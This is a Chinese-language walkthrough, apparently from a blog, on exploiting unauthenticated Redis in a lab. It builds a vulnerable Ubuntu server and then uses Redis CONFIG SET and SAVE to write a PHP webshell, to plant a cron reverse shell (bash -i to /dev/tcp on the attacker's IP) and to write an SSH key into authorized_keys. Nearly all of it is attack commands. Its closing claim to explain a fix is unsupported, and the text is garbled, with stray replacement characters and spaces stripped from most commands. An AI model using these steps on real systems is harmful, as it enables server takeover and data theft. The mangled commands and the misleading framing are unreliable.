漏洞原理
Redis 默認情況下,會綁定在 0.0.0.0:6379,如果沒有進行采用相關的策略,比如添加防火墻規則避免其他非信任來源 ip 訪問等,這樣將會將 Redis 服務暴露到公網上,如果在沒有設置密碼認證(一般為空)的情況下,會導致任意用戶在可以訪問目標服務器的情況下未授權訪問 Redis 以及讀取 Redis 的數據�。攻擊者在未授權訪問 Redis 的情況下,利用 Redis 自身的提供的config 命令,可以進行寫文件操作,攻擊者可以成功將自己的ssh公鑰寫入目標服務器的 /root/.ssh文件夾的authotrized_keys 文件中,進而可以使用對應私鑰直接使用ssh服務登錄目標服務器�����。
利用條件
redis綁定在 0.0.0.0:6379,且沒有進行添加防火墻規則避免其他非信任來源 ip 訪問等相關安全策略,直接暴露在公網
沒有設置密碼認證(一般為空),可以免密碼遠程登錄redis服務
漏洞危害
攻擊者無需認證訪問到內部數據,可能導致敏感信息泄露,黑客也可以惡意執行flushall來清空所有數據
攻擊者可通過eval執行lua代碼,或通過數據備份功能往磁盤寫入后門文件
最嚴重的情況,如果Redis以root身份運行,黑客可以給root賬戶寫入SSH公鑰文件,直接通過SSH登錄受害服務器
漏洞復現
搭建測試環境
受害機Ubuntu 20.04
安裝php:sudo apt install php7.4-cli libapache2-mod-php
安裝apache2:sudo apt install apache2 ��。并啟動apache服務:sudo service apache2 start ����。
安裝redis,環境需要4.x/5.x以下的redis版本,這里下載3.2版本的,并解壓����、編譯:
$wgethttp://download.redis.io/releases/redis-3.2.11.tar.gz$tar-zxvfredis-3.2.11.tar.gz$cdredis-3.2.11$make
如果make 時遇到以下報錯,需要安裝gcc,并設置啟動參數:
錯誤信息如下:
/bin/sh: cc: command not found
解決辦法,安裝gcc:
sudo apt install gcc
然后設置make啟動參數后即可運行:
make MALLOC=libc
4.編譯完成后,進入src目錄下,復制redis-cli和redis-server到/usr/bin/目錄下:
$cdsrc$sudocpredis-cliredis-server/usr/bin/
5.回到redis-3.2.11目錄中,復制redis.conf文件到/etc/目錄下:
$cd..$sudocpredis.conf/etc/
使用sudo vim /etc/redis.conf 編輯配置文件,將61行的IP注釋起來,表示外網可訪問,如下:
然后將80行的yes改為no,表示關閉保護模式,如下:
然后保存退出��。
使用redis-server /etc/redis.conf啟動redis服務:
打開一個新的終端,在窗口使用redis-cli 命令,測試能否正常連接redis:
使用quit退出redis命令行,然后在Ubuntu終端中開啟ssh服務,確保后面能使用ssh進行連接:
$sudoservicesshstart
攻擊機Kali 2021.1
只要能連上redis即可,需要有redis-cli 命令,如果沒有redis,需要進行安裝:
bash $ sudo apt install redis-tools
利用redis寫入webshell
利用條件
利用過程
測試使用Kali連接Ubuntu的redis服務:
$redis-cli-h192.168.101.6
如果成功連接上受害機,說明受害機存在redis未授權訪問漏洞�����。
redis可以寫入文件����。使用config get dir 命令可以查看寫入文件的目錄,并且可以用來修改寫入文件的目錄���。如下:
因為web服務無法訪問到/home目錄下的內容,所以需要修改redis保存文件的路徑,將其修改到網站的根目錄下,也就是 默認的 /var/www/html 目錄�����。因此redis需要具有對/var/www/html 寫入的權限,使用config set dir /var/www/html 來修改dir的值:
然后使用redis寫入文件:
$configsetdbfilenameshell.php$setxxx"<?phpphpinfo();?>"$save
然而并不能寫入文件,結果如下:
具體原因是因為redis對web根目錄沒有寫入權限,這是一個比較重要的點,也是能否利用未授權訪問來getshell的因素之一�。為了測試,此時需要手動在受害機網站根目錄中,新建一個其他用戶具有可寫入權限的文件夾,然后再將redis保存文件的dir值修改為新建文件夾的路徑:
此時再次進行寫入,可以看到已經保存成功了:
成功寫入文件后可以在受害機中進行查看:
現在在瀏覽器中訪問這個頁面試試:
從上面的訪問結果可以看出我們寫入的php代碼已經成功執行并返回�����。再次寫入文件,將一句話木馬寫入到目錄中:
訪問webshell頁面:
使用蟻劍連接webshell:
利用redis反彈shell
原理:在攻擊機上開啟nc反彈端口監聽,通過redis未授權訪問漏洞,寫入Linux定時計劃,反彈shell��。
利用條件對/var/spool/cron文件夾有寫入權限
利用過程首先在攻擊機監聽一個端口:
$nc-lvnp6666
在攻擊機開啟新的命令行窗口,連接受害機的redis服務,然后執行下面的命令:
$setx"\n\n\n*****bash-i>&/dev/tcp/192.168.101.8/66660>&1\n\n\n"$configsetdir/var/spool/cron/$configsetdbfilenameroot$save
注意此處的計劃任務命令,如果在Ubuntu中,是無法反彈shell的,原因是因為ubuntu會將redis寫入的緩存亂碼當作命令來解釋,導致執行不成功�����。而centos不會對亂碼進行解釋,可以成功執行反彈shell的命令�。
可以在受害機查看文件是否保存成功:
但是在ubuntu下無法反彈shell,這是由于redis向任務計劃文件里寫內容出現亂碼而導致的語法錯誤,而亂碼是避免不了的,centos會忽略亂碼去執行格式正確的任務計劃,而ubuntu并不會忽略這些亂碼,所以導致命令執行失敗,因為自己如果不使用redis寫任務計劃文件,而是正常向/etc/cron.d目錄下寫任務計劃文件的話,命令是可以正常執行的,所以還是亂碼的原因導致命令不能正常執行,而這個問題是不能解決的,因為利用redis未授權訪問寫的任務計劃文件里都有亂碼,這些代碼來自redis的緩存數據���。
利用redis寫入ssh公鑰
利用條件受害機必須有~/.ssh文件夾,無論是普通用戶還是root用戶,否則無法在redis中設置dir的值
直接使用~/.ssh是不行的,需要絕對路徑���。
另一個條件就是需要知道家目錄的名稱,比如上面的/home/unravel/.ssh,必須知道unravel
利用過程首先在攻擊機生成ssh公鑰,用于連接受害機時來使用私鑰驗證登陸:
$ssh-keygen
將公鑰開頭和結尾添加兩行換行,并存儲為新的文本文件,用于redis在連接時寫入的內容��。添加兩個換行的原因是對redis緩存垃圾數據和公鑰的內容分隔開來,以免ssh連接失敗�����?���?梢允褂胋ash命令來完成這個操作:
(echo-e"\n\n";cat~/.ssh/id_rsa.pub;echo-e"\n\n")>key.txt
使用攻擊機連接受害機時寫入變量x,x存儲攻擊機的公鑰:
catkey.txt|redis-cli-h192.168.101.6-xsetx
使用攻擊機連接受害機redis,將寫入的文件路徑設置為/home/unravel/.ssh,并設置保存的文件名稱為authorized_keys:
注意authorized_keys名稱是固定的,不能隨便改,否則連接不上ssh
bash $ config set dir /home/unravel/.ssh $ config set dbfilename authorized_keys $ save
然后在受害機文件中查看一下:
在攻擊機嘗試使用本地私鑰對受害機進行連接:
$sshunravel@192.168.101.6-i~/.ssh/id_rsa
上述就是小編為大家分享的Redis中出現未授權訪問如何解決了,如果剛好有類似的疑惑,不妨參照上述分析進行理解��。如果想知道更多相關知識,歡迎關注本站行業資訊頻道��。
